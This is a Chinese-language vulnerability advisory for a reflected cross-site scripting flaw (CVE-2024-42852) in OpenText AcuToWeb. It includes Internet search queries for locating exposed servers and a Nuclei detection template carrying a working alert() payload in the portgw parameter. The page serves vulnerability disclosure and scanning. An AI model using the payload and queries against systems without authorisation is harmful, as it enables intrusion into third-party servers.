AcuToWeb 跨站可执行脚本漏洞

漏洞信息

漏洞名称: AcuToWeb 跨站可执行脚本漏洞

漏洞编号:

  • CVE: CVE-2024-42852

漏洞类型: 跨站可执行脚本

漏洞等级: 中危

漏洞描述: AcuToWeb是由OpenText开发的一款网络应用产品,广泛用于企业级服务中,提供网络应用解决方案。该产品因其易用性和功能性在企业中较为常见。此次发现的漏洞属于跨站脚本(XSS)类型,具体表现为反射型XSS。漏洞的根源在于AcuToWeb服务器在处理portgw参数时未对用户输入进行适当的清理和验证,导致恶意脚本可以被注入并在用户浏览器中执行。这种漏洞允许攻击者在受害者的浏览器上下文中执行任意JavaScript代码,可能导致会话劫持、钓鱼攻击或其他恶意操作。由于漏洞的利用需要用户交互(如点击特制链接),因此被评定为中危。然而,考虑到AcuToWeb在企业环境中的广泛应用,该漏洞的潜在影响范围较广,建议相关用户尽快采取修补措施。

产品厂商: opentext

产品名称: acutoweb

影响版本: 10.5.0.7577c8b

搜索语法: title=”AcuToWeb”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/6dad111f403ec4afd4d815b3188a04347ce04795/http%2Fcves%2F2024%2FCVE-2024-42852.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50

id: CVE-2024-42852

info:
name: AcuToWeb server/10.5.0.7577c8b - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
AcuToWeb server/10.5.0.7577c8b is vulnerable to reflected cross-site scripting (XSS) via the portgw parameter. Unsanitized user input is reflected in the response, allowing arbitrary JavaScript execution.
reference:
- https://github.com/Hebing123/cve/issues/64
- https://nvd.nist.gov/vuln/detail/CVE-2024-42852
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2024-42852
cwe-id: CWE-79
cpe: cpe:2.3:a:opentext:acutoweb:10.5.0.7577c8b:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: opentext
product: acutoweb
fofa-query: title="AcuToWeb"
shodan-query: title:"AcuToWeb"
tags: cve,cve2024,xss,acutoweb,opentext

http:
- method: GET
path:
- "{{BaseURL}}/?portgw=80089948;%20alert(document.domain)"

matchers-condition: and
matchers:
- type: word
part: body
words:
- "80089948; alert(document.domain);"
- "WT_GW_PORT"
condition: and

- type: word
part: content_type
words:
- 'text/html'

- type: status
status:
- 200